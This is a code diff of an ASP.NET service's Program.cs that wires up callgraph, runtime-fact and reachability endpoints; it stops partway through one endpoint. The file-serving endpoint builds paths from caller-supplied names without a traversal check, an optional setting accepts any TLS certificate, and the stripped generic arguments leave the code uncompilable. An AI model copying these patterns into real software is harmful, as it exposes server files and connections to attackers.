+ builder.Services.AddHttpClient(RustFsCallgraphArtifactStore.HttpClientName, (sp, client) =>
+ {
+ var opts = sp.GetRequiredService>().Value;
+ client.Timeout = opts.Storage.RustFs.Timeout;
+ })
+ .ConfigurePrimaryHttpMessageHandler(sp =>
+ {
+ var opts = sp.GetRequiredService>().Value;
+ var handler = new HttpClientHandler();
+ if (opts.Storage.RustFs.AllowInsecureTls)
+ {
+ handler.ServerCertificateCustomValidationCallback = HttpClientHandler.DangerousAcceptAnyServerCertificateValidator;
+ }
+ return handler;
+ });
+
+ builder.Services.AddSingleton();
+}
+else
+{
+ builder.Services.AddSingleton();
+}
+
+builder.Services.AddSingleton(new SimpleJsonCallgraphParser("java"));
+builder.Services.AddSingleton(new SimpleJsonCallgraphParser("nodejs"));
+builder.Services.AddSingleton(new SimpleJsonCallgraphParser("python"));
+builder.Services.AddSingleton(new SimpleJsonCallgraphParser("go"));
+builder.Services.AddSingleton();
+builder.Services.AddSingleton();
+builder.Services.AddSingleton();
+builder.Services.AddSingleton(sp =>
+{
+ var options = sp.GetRequiredService>().Value;
+ return new RedisReachabilityCache(options.Cache);
+});
+builder.Services.AddSingleton();
+builder.Services.AddSingleton(sp =>
+{
+ var inner = sp.GetRequiredService();
+ var cache = sp.GetRequiredService();
+ return new ReachabilityFactCacheDecorator(inner, cache);
+});
+builder.Services.AddSingleton();
+builder.Services.AddSingleton();
+builder.Services.AddSingleton();
+builder.Services.AddSingleton();
+builder.Services.AddSingleton();
+builder.Services.AddSingleton();
if (bootstrap.Authority.Enabled)
{
@@ -216,471 +245,471 @@ app.UseAuthentication();
app.UseAuthorization();
app.MapHealthChecks("/healthz").AllowAnonymous();
-app.MapGet("/readyz", (SignalsStartupState state, SignalsSealedModeMonitor sealedModeMonitor) =>
-{
- if (!sealedModeMonitor.IsCompliant(out var reason))
- {
- return Results.Json(
- new { status = "sealed-mode-blocked", reason },
- statusCode: StatusCodes.Status503ServiceUnavailable);
- }
-
- return state.IsReady
- ? Results.Ok(new { status = "ready" })
- : Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
-}).AllowAnonymous();
+app.MapGet("/readyz", (SignalsStartupState state, SignalsSealedModeMonitor sealedModeMonitor) =>
+{
+ if (!sealedModeMonitor.IsCompliant(out var reason))
+ {
+ return Results.Json(
+ new { status = "sealed-mode-blocked", reason },
+ statusCode: StatusCodes.Status503ServiceUnavailable);
+ }
-var signalsGroup = app.MapGroup("/signals");
-
-signalsGroup.MapGet("/ping", (HttpContext context, SignalsOptions options, SignalsSealedModeMonitor sealedModeMonitor) =>
-{
- if (!Program.TryAuthorize(context, requiredScope: SignalsPolicies.Read, fallbackAllowed: options.Authority.AllowAnonymousFallback, out var authFailure))
- {
- return authFailure ?? Results.Unauthorized();
- }
-
- if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
- {
- return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
- }
-
- return Results.NoContent();
-}).WithName("SignalsPing");
+ return state.IsReady
+ ? Results.Ok(new { status = "ready" })
+ : Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
+}).AllowAnonymous();
-signalsGroup.MapGet("/status", (HttpContext context, SignalsOptions options, SignalsSealedModeMonitor sealedModeMonitor) =>
-{
- if (!Program.TryAuthorize(context, SignalsPolicies.Read, options.Authority.AllowAnonymousFallback, out var failure))
- {
- return failure ?? Results.Unauthorized();
- }
-
- var sealedCompliant = sealedModeMonitor.IsCompliant(out var sealedReason);
- return Results.Ok(new
- {
- service = "signals",
- version = typeof(Program).Assembly.GetName().Version?.ToString() ?? "unknown",
- sealedMode = new
- {
- enforced = sealedModeMonitor.EnforcementEnabled,
- compliant = sealedCompliant,
- reason = sealedCompliant ? null : sealedReason
- }
- });
-}).WithName("SignalsStatus");
+var signalsGroup = app.MapGroup("/signals");
+
+signalsGroup.MapGet("/ping", (HttpContext context, SignalsOptions options, SignalsSealedModeMonitor sealedModeMonitor) =>
+{
+ if (!Program.TryAuthorize(context, requiredScope: SignalsPolicies.Read, fallbackAllowed: options.Authority.AllowAnonymousFallback, out var authFailure))
+ {
+ return authFailure ?? Results.Unauthorized();
+ }
+
+ if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
+ {
+ return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
+ }
+
+ return Results.NoContent();
+}).WithName("SignalsPing");
+
+signalsGroup.MapGet("/status", (HttpContext context, SignalsOptions options, SignalsSealedModeMonitor sealedModeMonitor) =>
+{
+ if (!Program.TryAuthorize(context, SignalsPolicies.Read, options.Authority.AllowAnonymousFallback, out var failure))
+ {
+ return failure ?? Results.Unauthorized();
+ }
+
+ var sealedCompliant = sealedModeMonitor.IsCompliant(out var sealedReason);
+ return Results.Ok(new
+ {
+ service = "signals",
+ version = typeof(Program).Assembly.GetName().Version?.ToString() ?? "unknown",
+ sealedMode = new
+ {
+ enforced = sealedModeMonitor.EnforcementEnabled,
+ compliant = sealedCompliant,
+ reason = sealedCompliant ? null : sealedReason
+ }
+ });
+}).WithName("SignalsStatus");
+
+signalsGroup.MapPost("/callgraphs", async Task (
+ HttpContext context,
+ SignalsOptions options,
+ CallgraphIngestRequest request,
+ ICallgraphIngestionService ingestionService,
+ SignalsSealedModeMonitor sealedModeMonitor,
+ CancellationToken cancellationToken) =>
+{
+ if (!Program.TryAuthorize(context, SignalsPolicies.Write, options.Authority.AllowAnonymousFallback, out var authFailure))
+ {
+ return authFailure ?? Results.Unauthorized();
+ }
+
+ if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
+ {
+ return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
+ }
+
+ try
+ {
+ var result = await ingestionService.IngestAsync(request, cancellationToken).ConfigureAwait(false);
+ return Results.Accepted($"/signals/callgraphs/{result.CallgraphId}", result);
+ }
+ catch (CallgraphIngestionValidationException ex)
+ {
+ return Results.BadRequest(new { error = ex.Message });
+ }
+ catch (CallgraphParserNotFoundException ex)
+ {
+ return Results.BadRequest(new { error = ex.Message });
+ }
+ catch (CallgraphParserValidationException ex)
+ {
+ return Results.UnprocessableEntity(new { error = ex.Message });
+ }
+ catch (FormatException ex)
+ {
+ return Results.BadRequest(new { error = ex.Message });
+ }
+}).WithName("SignalsCallgraphIngest");
+
+signalsGroup.MapGet("/callgraphs/{callgraphId}", async Task (
+ HttpContext context,
+ SignalsOptions options,
+ string callgraphId,
+ ICallgraphRepository callgraphRepository,
+ SignalsSealedModeMonitor sealedModeMonitor,
+ CancellationToken cancellationToken) =>
+{
+ if (!Program.TryAuthorize(context, SignalsPolicies.Read, options.Authority.AllowAnonymousFallback, out var authFailure))
+ {
+ return authFailure ?? Results.Unauthorized();
+ }
+
+ if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
+ {
+ return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
+ }
+
+ if (string.IsNullOrWhiteSpace(callgraphId))
+ {
+ return Results.BadRequest(new { error = "callgraphId is required." });
+ }
+
+ var document = await callgraphRepository.GetByIdAsync(callgraphId.Trim(), cancellationToken).ConfigureAwait(false);
+ return document is null ? Results.NotFound() : Results.Ok(document);
+}).WithName("SignalsCallgraphGet");
+
+signalsGroup.MapGet("/callgraphs/{callgraphId}/manifest", async Task (
+ HttpContext context,
+ SignalsOptions options,
+ string callgraphId,
+ ICallgraphRepository callgraphRepository,
+ SignalsSealedModeMonitor sealedModeMonitor,
+ CancellationToken cancellationToken) =>
+{
+ if (!Program.TryAuthorize(context, SignalsPolicies.Read, options.Authority.AllowAnonymousFallback, out var authFailure))
+ {
+ return authFailure ?? Results.Unauthorized();
+ }
+
+ if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
+ {
+ return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
+ }
+
+ if (string.IsNullOrWhiteSpace(callgraphId))
+ {
+ return Results.BadRequest(new { error = "callgraphId is required." });
+ }
+
+ var document = await callgraphRepository.GetByIdAsync(callgraphId.Trim(), cancellationToken).ConfigureAwait(false);
+ if (document is null || string.IsNullOrWhiteSpace(document.Artifact.ManifestPath))
+ {
+ return Results.NotFound();
+ }
+
+ var manifestPath = Path.Combine(options.Storage.RootPath, document.Artifact.ManifestPath);
+ if (!File.Exists(manifestPath))
+ {
+ return Results.NotFound(new { error = "manifest not found" });
+ }
+
+ var bytes = await File.ReadAllBytesAsync(manifestPath, cancellationToken).ConfigureAwait(false);
+ return Results.File(bytes, "application/json");
+}).WithName("SignalsCallgraphManifestGet");
+
+signalsGroup.MapPost("/runtime-facts", async Task (
+ HttpContext context,
+ SignalsOptions options,
+ RuntimeFactsIngestRequest request,
+ IRuntimeFactsIngestionService ingestionService,
+ SignalsSealedModeMonitor sealedModeMonitor,
+ CancellationToken cancellationToken) =>
+{
+ if (!Program.TryAuthorize(context, SignalsPolicies.Write, options.Authority.AllowAnonymousFallback, out var authFailure))
+ {
+ return authFailure ?? Results.Unauthorized();
+ }
+
+ if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
+ {
+ return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
+ }
+
+ try
+ {
+ var response = await ingestionService.IngestAsync(request, cancellationToken).ConfigureAwait(false);
+ return Results.Accepted($"/signals/runtime-facts/{response.SubjectKey}", response);
+ }
+ catch (RuntimeFactsValidationException ex)
+ {
+ return Results.BadRequest(new { error = ex.Message });
+ }
+}).WithName("SignalsRuntimeIngest");
+
+signalsGroup.MapPost("/reachability/union", async Task (
+ HttpContext context,
+ SignalsOptions options,
+ [FromHeader(Name = "X-Analysis-Id")] string? analysisId,
+ IReachabilityUnionIngestionService ingestionService,
+ SignalsSealedModeMonitor sealedModeMonitor,
+ CancellationToken cancellationToken) =>
+{
+ if (!Program.TryAuthorize(context, SignalsPolicies.Write, options.Authority.AllowAnonymousFallback, out var authFailure))
+ {
+ return authFailure ?? Results.Unauthorized();
+ }
+
+ if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
+ {
+ return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
+ }
+
+ var id = string.IsNullOrWhiteSpace(analysisId) ? Guid.NewGuid().ToString("N") : analysisId.Trim();
+
+ if (!string.Equals(context.Request.ContentType, "application/zip", StringComparison.OrdinalIgnoreCase))
+ {
+ return Results.BadRequest(new { error = "Content-Type must be application/zip" });
+ }
+
+ try
+ {
+ var response = await ingestionService.IngestAsync(id, context.Request.Body, cancellationToken).ConfigureAwait(false);
+ return Results.Accepted($"/signals/reachability/union/{response.AnalysisId}/meta", response);
+ }
+ catch (Exception ex)
+ {
+ return Results.BadRequest(new { error = ex.Message });
+ }
+}).WithName("SignalsReachabilityUnionIngest");
+
+signalsGroup.MapGet("/reachability/union/{analysisId}/meta", async Task (
+ HttpContext context,
+ SignalsOptions options,
+ string analysisId,
+ SignalsSealedModeMonitor sealedModeMonitor,
+ CancellationToken cancellationToken) =>
+{
+ if (!Program.TryAuthorize(context, SignalsPolicies.Read, options.Authority.AllowAnonymousFallback, out var authFailure))
+ {
+ return authFailure ?? Results.Unauthorized();
+ }
+
+ if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
+ {
+ return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
+ }
+
+ if (string.IsNullOrWhiteSpace(analysisId))
+ {
+ return Results.BadRequest(new { error = "analysisId is required." });
+ }
+
+ var path = Path.Combine(options.Storage.RootPath, "reachability_graphs", analysisId.Trim(), "meta.json");
+ if (!File.Exists(path))
+ {
+ return Results.NotFound();
+ }
+
+ var bytes = await File.ReadAllBytesAsync(path, cancellationToken).ConfigureAwait(false);
+ return Results.File(bytes, "application/json");
+}).WithName("SignalsReachabilityUnionMeta");
+
+signalsGroup.MapGet("/reachability/union/{analysisId}/files/{fileName}", async Task (
+ HttpContext context,
+ SignalsOptions options,
+ string analysisId,
+ string fileName,
+ SignalsSealedModeMonitor sealedModeMonitor,
+ CancellationToken cancellationToken) =>
+{
+ if (!Program.TryAuthorize(context, SignalsPolicies.Read, options.Authority.AllowAnonymousFallback, out var authFailure))
+ {
+ return authFailure ?? Results.Unauthorized();
+ }
+
+ if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
+ {
+ return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
+ }
+
+ if (string.IsNullOrWhiteSpace(analysisId) || string.IsNullOrWhiteSpace(fileName))
+ {
+ return Results.BadRequest(new { error = "analysisId and fileName are required." });
+ }
+
+ var root = Path.Combine(options.Storage.RootPath, "reachability_graphs", analysisId.Trim());
+ var path = Path.Combine(root, fileName.Replace('/', Path.DirectorySeparatorChar));
+ if (!File.Exists(path))
+ {
+ return Results.NotFound();
+ }
+
+ var contentType = fileName.EndsWith(".json", StringComparison.OrdinalIgnoreCase) ? "application/json" : "application/x-ndjson";
+ var bytes = await File.ReadAllBytesAsync(path, cancellationToken).ConfigureAwait(false);
+ return Results.File(bytes, contentType);
+}).WithName("SignalsReachabilityUnionFile");
+
+signalsGroup.MapPost("/runtime-facts/ndjson", async Task (
+ HttpContext context,
+ SignalsOptions options,
+ [AsParameters] RuntimeFactsStreamMetadata metadata,
+ IRuntimeFactsIngestionService ingestionService,
+ SignalsSealedModeMonitor sealedModeMonitor,
+ CancellationToken cancellationToken) =>
+{
+ if (!Program.TryAuthorize(context, SignalsPolicies.Write, options.Authority.AllowAnonymousFallback, out var authFailure))
+ {
+ return authFailure ?? Results.Unauthorized();
+ }
+
+ if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
+ {
+ return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
+ }
+
+ if (metadata is null || string.IsNullOrWhiteSpace(metadata.CallgraphId))
+ {
+ return Results.BadRequest(new { error = "callgraphId is required." });
+ }
+
+ var subject = metadata.ToSubject();
+
+ var isGzip = string.Equals(context.Request.Headers.ContentEncoding, "gzip", StringComparison.OrdinalIgnoreCase);
+ var events = await RuntimeFactsNdjsonReader.ReadAsync(context.Request.Body, isGzip, cancellationToken).ConfigureAwait(false);
+ if (events.Count == 0)
+ {
+ return Results.BadRequest(new { error = "runtime fact stream was empty." });
+ }
+
+ var request = new RuntimeFactsIngestRequest
+ {
+ Subject = subject,
+ CallgraphId = metadata.CallgraphId,
+ Events = events
+ };
+
+ try
+ {
+ var response = await ingestionService.IngestAsync(request, cancellationToken).ConfigureAwait(false);
+ return Results.Accepted($"/signals/runtime-facts/{response.SubjectKey}", response);
+ }
+ catch (RuntimeFactsValidationException ex)
+ {
+ return Results.BadRequest(new { error = ex.Message });
+ }
+}).WithName("SignalsRuntimeIngestNdjson");
+
+signalsGroup.MapGet("/facts/{subjectKey}", async Task (
+ HttpContext context,
+ SignalsOptions options,
+ string subjectKey,
+ IReachabilityFactRepository factRepository,
+ SignalsSealedModeMonitor sealedModeMonitor,
+ CancellationToken cancellationToken) =>
+{
+ if (!Program.TryAuthorize(context, SignalsPolicies.Read, options.Authority.AllowAnonymousFallback, out var authFailure))
+ {
+ return authFailure ?? Results.Unauthorized();
+ }
+
+ if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
+ {
+ return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
+ }
+
+ if (string.IsNullOrWhiteSpace(subjectKey))
+ {
+ return Results.BadRequest(new { error = "subjectKey is required." });
+ }
+
+ var fact = await factRepository.GetBySubjectAsync(subjectKey.Trim(), cancellationToken).ConfigureAwait(false);
+ return fact is null ? Results.NotFound() : Results.Ok(fact);
+}).WithName("SignalsFactsGet");
+
+signalsGroup.MapPost("/unknowns", async Task (
+ HttpContext context,
+ SignalsOptions options,
+ UnknownsIngestRequest request,
+ IUnknownsIngestionService ingestionService,
+ SignalsSealedModeMonitor sealedModeMonitor,
+ CancellationToken cancellationToken) =>
+{
+ if (!Program.TryAuthorize(context, SignalsPolicies.Write, options.Authority.AllowAnonymousFallback, out var authFailure))
+ {
+ return authFailure ?? Results.Unauthorized();
+ }
+
+ if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
+ {
+ return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
+ }
+
+ try
+ {
+ var response = await ingestionService.IngestAsync(request, cancellationToken).ConfigureAwait(false);
+ return Results.Accepted($"/signals/unknowns/{response.SubjectKey}", response);
+ }
+ catch (UnknownsValidationException ex)
+ {
+ return Results.BadRequest(new { error = ex.Message });
+ }
+}).WithName("SignalsUnknownsIngest");
+
+signalsGroup.MapGet("/unknowns/{subjectKey}", async Task (
+ HttpContext context,
+ SignalsOptions options,
+ string subjectKey,
+ IUnknownsRepository repository,
+ SignalsSealedModeMonitor sealedModeMonitor,
+ CancellationToken cancellationToken) =>
+{
+ if (!Program.TryAuthorize(context, SignalsPolicies.Read, options.Authority.AllowAnonymousFallback, out var authFailure))
+ {
+ return authFailure ?? Results.Unauthorized();
+ }
+
+ if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
+ {
+ return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
+ }
+
+ if (string.IsNullOrWhiteSpace(subjectKey))
+ {
+ return Results.BadRequest(new { error = "subjectKey is required." });
+ }
+
+ var items = await repository.GetBySubjectAsync(subjectKey.Trim(), cancellationToken).ConfigureAwait(false);
+ return items.Count == 0 ? Results.NotFound() : Results.Ok(items);
+}).WithName("SignalsUnknownsGet");
+
+signalsGroup.MapPost("/reachability/recompute", async Task (
+ HttpContext context,
+ SignalsOptions options,
+ ReachabilityRecomputeRequest request,
+ IReachabilityScoringService scoringService,
+ SignalsSealedModeMonitor sealedModeMonitor,
+ CancellationToken cancellationToken) =>
+{
+ if (!Program.TryAuthorize(context, SignalsPolicies.Admin, options.Authority.AllowAnonymousFallback, out var authFailure))
+ {
+ return authFailure ?? Results.Unauthorized();
+ }
+
+ if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
+ {
+ return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
+ }
+
+ try
+ {
+ var fact = await scoringService.RecomputeAsync(request, cancellationToken).ConfigureAwait(false);
+ return Results.Ok(new
+ {
+ fact.Id,
+ fact.CallgraphId,
+ subject = fact.Subject,
+ fact.EntryPoints,
+ fact.States,
+ fact.ComputedAt
+ });
+ }
+ catch (ReachabilityScoringValidationException ex)
+ {
+ return Results.BadRequest(new { error = ex.Message });
+ }
+ catch (ReachabilityCallgraphNotFoundException ex)
+ {
+ return Results.NotFound(new { error = ex.Message });
+ }
+}).WithName("SignalsReachabilityRecompute");
-signalsGroup.MapPost("/callgraphs", async Task (
- HttpContext context,
- SignalsOptions options,
- CallgraphIngestRequest request,
- ICallgraphIngestionService ingestionService,
- SignalsSealedModeMonitor sealedModeMonitor,
- CancellationToken cancellationToken) =>
-{
- if (!Program.TryAuthorize(context, SignalsPolicies.Write, options.Authority.AllowAnonymousFallback, out var authFailure))
- {
- return authFailure ?? Results.Unauthorized();
- }
-
- if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
- {
- return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
- }
-
- try
- {
- var result = await ingestionService.IngestAsync(request, cancellationToken).ConfigureAwait(false);
- return Results.Accepted($"/signals/callgraphs/{result.CallgraphId}", result);
- }
- catch (CallgraphIngestionValidationException ex)
- {
- return Results.BadRequest(new { error = ex.Message });
- }
- catch (CallgraphParserNotFoundException ex)
- {
- return Results.BadRequest(new { error = ex.Message });
- }
- catch (CallgraphParserValidationException ex)
- {
- return Results.UnprocessableEntity(new { error = ex.Message });
- }
- catch (FormatException ex)
- {
- return Results.BadRequest(new { error = ex.Message });
- }
-}).WithName("SignalsCallgraphIngest");
-
-signalsGroup.MapGet("/callgraphs/{callgraphId}", async Task (
- HttpContext context,
- SignalsOptions options,
- string callgraphId,
- ICallgraphRepository callgraphRepository,
- SignalsSealedModeMonitor sealedModeMonitor,
- CancellationToken cancellationToken) =>
-{
- if (!Program.TryAuthorize(context, SignalsPolicies.Read, options.Authority.AllowAnonymousFallback, out var authFailure))
- {
- return authFailure ?? Results.Unauthorized();
- }
-
- if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
- {
- return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
- }
-
- if (string.IsNullOrWhiteSpace(callgraphId))
- {
- return Results.BadRequest(new { error = "callgraphId is required." });
- }
-
- var document = await callgraphRepository.GetByIdAsync(callgraphId.Trim(), cancellationToken).ConfigureAwait(false);
- return document is null ? Results.NotFound() : Results.Ok(document);
-}).WithName("SignalsCallgraphGet");
-
-signalsGroup.MapGet("/callgraphs/{callgraphId}/manifest", async Task (
- HttpContext context,
- SignalsOptions options,
- string callgraphId,
- ICallgraphRepository callgraphRepository,
- SignalsSealedModeMonitor sealedModeMonitor,
- CancellationToken cancellationToken) =>
-{
- if (!Program.TryAuthorize(context, SignalsPolicies.Read, options.Authority.AllowAnonymousFallback, out var authFailure))
- {
- return authFailure ?? Results.Unauthorized();
- }
-
- if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
- {
- return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
- }
-
- if (string.IsNullOrWhiteSpace(callgraphId))
- {
- return Results.BadRequest(new { error = "callgraphId is required." });
- }
-
- var document = await callgraphRepository.GetByIdAsync(callgraphId.Trim(), cancellationToken).ConfigureAwait(false);
- if (document is null || string.IsNullOrWhiteSpace(document.Artifact.ManifestPath))
- {
- return Results.NotFound();
- }
-
- var manifestPath = Path.Combine(options.Storage.RootPath, document.Artifact.ManifestPath);
- if (!File.Exists(manifestPath))
- {
- return Results.NotFound(new { error = "manifest not found" });
- }
-
- var bytes = await File.ReadAllBytesAsync(manifestPath, cancellationToken).ConfigureAwait(false);
- return Results.File(bytes, "application/json");
-}).WithName("SignalsCallgraphManifestGet");
-
-signalsGroup.MapPost("/runtime-facts", async Task (
- HttpContext context,
- SignalsOptions options,
- RuntimeFactsIngestRequest request,
- IRuntimeFactsIngestionService ingestionService,
- SignalsSealedModeMonitor sealedModeMonitor,
- CancellationToken cancellationToken) =>
-{
- if (!Program.TryAuthorize(context, SignalsPolicies.Write, options.Authority.AllowAnonymousFallback, out var authFailure))
- {
- return authFailure ?? Results.Unauthorized();
- }
-
- if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
- {
- return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
- }
-
- try
- {
- var response = await ingestionService.IngestAsync(request, cancellationToken).ConfigureAwait(false);
- return Results.Accepted($"/signals/runtime-facts/{response.SubjectKey}", response);
- }
- catch (RuntimeFactsValidationException ex)
- {
- return Results.BadRequest(new { error = ex.Message });
- }
-}).WithName("SignalsRuntimeIngest");
-
-signalsGroup.MapPost("/reachability/union", async Task (
- HttpContext context,
- SignalsOptions options,
- [FromHeader(Name = "X-Analysis-Id")] string? analysisId,
- IReachabilityUnionIngestionService ingestionService,
- SignalsSealedModeMonitor sealedModeMonitor,
- CancellationToken cancellationToken) =>
-{
- if (!Program.TryAuthorize(context, SignalsPolicies.Write, options.Authority.AllowAnonymousFallback, out var authFailure))
- {
- return authFailure ?? Results.Unauthorized();
- }
-
- if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
- {
- return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
- }
-
- var id = string.IsNullOrWhiteSpace(analysisId) ? Guid.NewGuid().ToString("N") : analysisId.Trim();
-
- if (!string.Equals(context.Request.ContentType, "application/zip", StringComparison.OrdinalIgnoreCase))
- {
- return Results.BadRequest(new { error = "Content-Type must be application/zip" });
- }
-
- try
- {
- var response = await ingestionService.IngestAsync(id, context.Request.Body, cancellationToken).ConfigureAwait(false);
- return Results.Accepted($"/signals/reachability/union/{response.AnalysisId}/meta", response);
- }
- catch (Exception ex)
- {
- return Results.BadRequest(new { error = ex.Message });
- }
-}).WithName("SignalsReachabilityUnionIngest");
-
-signalsGroup.MapGet("/reachability/union/{analysisId}/meta", async Task (
- HttpContext context,
- SignalsOptions options,
- string analysisId,
- SignalsSealedModeMonitor sealedModeMonitor,
- CancellationToken cancellationToken) =>
-{
- if (!Program.TryAuthorize(context, SignalsPolicies.Read, options.Authority.AllowAnonymousFallback, out var authFailure))
- {
- return authFailure ?? Results.Unauthorized();
- }
-
- if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
- {
- return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
- }
-
- if (string.IsNullOrWhiteSpace(analysisId))
- {
- return Results.BadRequest(new { error = "analysisId is required." });
- }
-
- var path = Path.Combine(options.Storage.RootPath, "reachability_graphs", analysisId.Trim(), "meta.json");
- if (!File.Exists(path))
- {
- return Results.NotFound();
- }
-
- var bytes = await File.ReadAllBytesAsync(path, cancellationToken).ConfigureAwait(false);
- return Results.File(bytes, "application/json");
-}).WithName("SignalsReachabilityUnionMeta");
-
-signalsGroup.MapGet("/reachability/union/{analysisId}/files/{fileName}", async Task (
- HttpContext context,
- SignalsOptions options,
- string analysisId,
- string fileName,
- SignalsSealedModeMonitor sealedModeMonitor,
- CancellationToken cancellationToken) =>
-{
- if (!Program.TryAuthorize(context, SignalsPolicies.Read, options.Authority.AllowAnonymousFallback, out var authFailure))
- {
- return authFailure ?? Results.Unauthorized();
- }
-
- if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
- {
- return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
- }
-
- if (string.IsNullOrWhiteSpace(analysisId) || string.IsNullOrWhiteSpace(fileName))
- {
- return Results.BadRequest(new { error = "analysisId and fileName are required." });
- }
-
- var root = Path.Combine(options.Storage.RootPath, "reachability_graphs", analysisId.Trim());
- var path = Path.Combine(root, fileName.Replace('/', Path.DirectorySeparatorChar));
- if (!File.Exists(path))
- {
- return Results.NotFound();
- }
-
- var contentType = fileName.EndsWith(".json", StringComparison.OrdinalIgnoreCase) ? "application/json" : "application/x-ndjson";
- var bytes = await File.ReadAllBytesAsync(path, cancellationToken).ConfigureAwait(false);
- return Results.File(bytes, contentType);
-}).WithName("SignalsReachabilityUnionFile");
-
-signalsGroup.MapPost("/runtime-facts/ndjson", async Task (
- HttpContext context,
- SignalsOptions options,
- [AsParameters] RuntimeFactsStreamMetadata metadata,
- IRuntimeFactsIngestionService ingestionService,
- SignalsSealedModeMonitor sealedModeMonitor,
- CancellationToken cancellationToken) =>
-{
- if (!Program.TryAuthorize(context, SignalsPolicies.Write, options.Authority.AllowAnonymousFallback, out var authFailure))
- {
- return authFailure ?? Results.Unauthorized();
- }
-
- if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
- {
- return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
- }
-
- if (metadata is null || string.IsNullOrWhiteSpace(metadata.CallgraphId))
- {
- return Results.BadRequest(new { error = "callgraphId is required." });
- }
-
- var subject = metadata.ToSubject();
-
- var isGzip = string.Equals(context.Request.Headers.ContentEncoding, "gzip", StringComparison.OrdinalIgnoreCase);
- var events = await RuntimeFactsNdjsonReader.ReadAsync(context.Request.Body, isGzip, cancellationToken).ConfigureAwait(false);
- if (events.Count == 0)
- {
- return Results.BadRequest(new { error = "runtime fact stream was empty." });
- }
-
- var request = new RuntimeFactsIngestRequest
- {
- Subject = subject,
- CallgraphId = metadata.CallgraphId,
- Events = events
- };
-
- try
- {
- var response = await ingestionService.IngestAsync(request, cancellationToken).ConfigureAwait(false);
- return Results.Accepted($"/signals/runtime-facts/{response.SubjectKey}", response);
- }
- catch (RuntimeFactsValidationException ex)
- {
- return Results.BadRequest(new { error = ex.Message });
- }
-}).WithName("SignalsRuntimeIngestNdjson");
-
-signalsGroup.MapGet("/facts/{subjectKey}", async Task (
- HttpContext context,
- SignalsOptions options,
- string subjectKey,
- IReachabilityFactRepository factRepository,
- SignalsSealedModeMonitor sealedModeMonitor,
- CancellationToken cancellationToken) =>
-{
- if (!Program.TryAuthorize(context, SignalsPolicies.Read, options.Authority.AllowAnonymousFallback, out var authFailure))
- {
- return authFailure ?? Results.Unauthorized();
- }
-
- if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
- {
- return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
- }
-
- if (string.IsNullOrWhiteSpace(subjectKey))
- {
- return Results.BadRequest(new { error = "subjectKey is required." });
- }
-
- var fact = await factRepository.GetBySubjectAsync(subjectKey.Trim(), cancellationToken).ConfigureAwait(false);
- return fact is null ? Results.NotFound() : Results.Ok(fact);
-}).WithName("SignalsFactsGet");
-
-signalsGroup.MapPost("/unknowns", async Task (
- HttpContext context,
- SignalsOptions options,
- UnknownsIngestRequest request,
- IUnknownsIngestionService ingestionService,
- SignalsSealedModeMonitor sealedModeMonitor,
- CancellationToken cancellationToken) =>
-{
- if (!Program.TryAuthorize(context, SignalsPolicies.Write, options.Authority.AllowAnonymousFallback, out var authFailure))
- {
- return authFailure ?? Results.Unauthorized();
- }
-
- if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
- {
- return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
- }
-
- try
- {
- var response = await ingestionService.IngestAsync(request, cancellationToken).ConfigureAwait(false);
